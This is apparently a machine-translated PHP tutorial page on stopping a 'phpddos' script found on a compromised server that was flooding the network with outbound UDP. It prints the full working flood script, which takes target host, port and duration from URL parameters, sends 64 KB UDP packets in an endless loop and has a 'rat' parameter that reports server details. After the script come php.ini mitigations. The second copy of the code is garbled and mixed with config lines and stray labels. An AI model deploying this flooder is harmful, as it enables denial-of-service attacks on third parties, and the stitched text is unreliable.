Solution to phpddos attack (the server sends a large number of data packets to the external network)_PHP tutorial

Today, one of my machines suddenly sent a large number of data packets to the outside world, which was more than 1G per second. Although I used a policy to prohibit UDP packets, they could not be sent out, but it took up a lot of money, so I finally found a way to solve it.

Look at the source code first

The code is as follows

Copy code

代码如下

复制代码

set_time_limit(999999); $host = $_GET['host']; $port = $_GET['port']; $exec_time = $_GET['time']; $Sendlen = 65535; $packets = 0; ignore_user_abort(True); if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ if (StrLen($_GET['rat'])<>0){                 echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER ['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];                 exit;             }         echo "Parameters can not be empty!";         exit;     } for($i=0;$i<$Sendlen;$i++){ $out .= "A"; } $max_time = time()+$exec_time; while(1){ $packets++; if(time() > $max_time){         break;     }     $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);         if($fp){             fwrite($fp, $out);             fclose($fp);     } } echo "Send Host：$host:$port "; echo "Send Flow：$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb "; echo "Send Rate：" . round($packets/$exec_time, 2) . " packs/s；" . round($packets/ $exec_time*$Sendlen/1024/1024, 2) . " mb/s"; ?>

set_time_limit(999999);

$host = $_GET['host'];

代码如下	复制代码
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

$port = $_GET ['port'];

$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;

ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
     if (StrLen($_GET['rat'])<>0 ){ echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER

代码如下	复制代码
allow_url_fopen = Off

['SERVER_NAME'])."|".php_uname() ."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];

exit;

代码如下	复制代码
extension=php_sockets.dll 改成 ;extension=php_sockets.dll

} echo "Parameters can not be empty!"; exit; }for($i=0;$i<$Sendlen;$i++){<🎜> $out .= "A";<🎜> }<🎜><🎜>$max_time = time ()+$exec_time;<🎜><🎜>while(1){<🎜> $packets++;<🎜> if(time() > $max_time){ break; } $ fp = fsockopen ("udp://$host", $port, $errno, $errstr, 5); ($fp); }}echo "Send Host：$host:$port

";echo "Send Flow：$packets * ( $Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " .round($packets*$Sendlen/1024/1024, 2) . " mb";echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$ Sendlen/1024/1024, 2) . " mb/s";?>

The key code is The method is very simple. Send UDP packets to the target host and define an infinite loop, which will create greater pressure. This pressure is on the server that executes this script, because it first consumes a lot of its own network bandwidth, CPU and other resources. If you want to use this script to put pressure on the target site, you need to execute the script on multiple servers, DDOS Since you are using fsockopen to request the outside, then don’t let him request itSet in php.ini

The code is as follows	Copy code
allow_url_fopen = Off

If so, he can still send the package

The code is as follows	Copy code
extension=php_sockets .dll changed to ;extension=php_sockets.dll

Restart APACHE, IIS, NGINX
This can prevent PHP DDOS from sending packages

Other netizens said

It is very simple to set the script not to allow no timeout, 1. Disable the set_time_limit function, 2. Enable PHP's safe mode (safe_mode=on)

Disabling the socket function can directly disable all socket modules or disable the fsockopen function,

is recommended, because sockets are commonly used In order to retrieve the password by sending an email, it is recommended to turn on the safe mode directly. However,

in this case, the script will time out every 30 seconds. It is estimated that no "hacker" is lonely enough to click to start DDOS every 30 seconds. . .

Experience: This kind of problem is usually caused by website security. We should pay attention to the security of the website and the security of the server, so that it is not easy to be invaded. If you know how to use macofee, you can restrict the website. It will be better.

http://www.bkjia.com/PHPjc/444720.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/444720.htmlTechArticleToday, one of my machines suddenly sent a large number of data packets to the outside world, which can reach more than 1G per second. Although I used The policy prohibits UDP packets from being sent out, but it takes up a lot of cup, so in the end I still want to...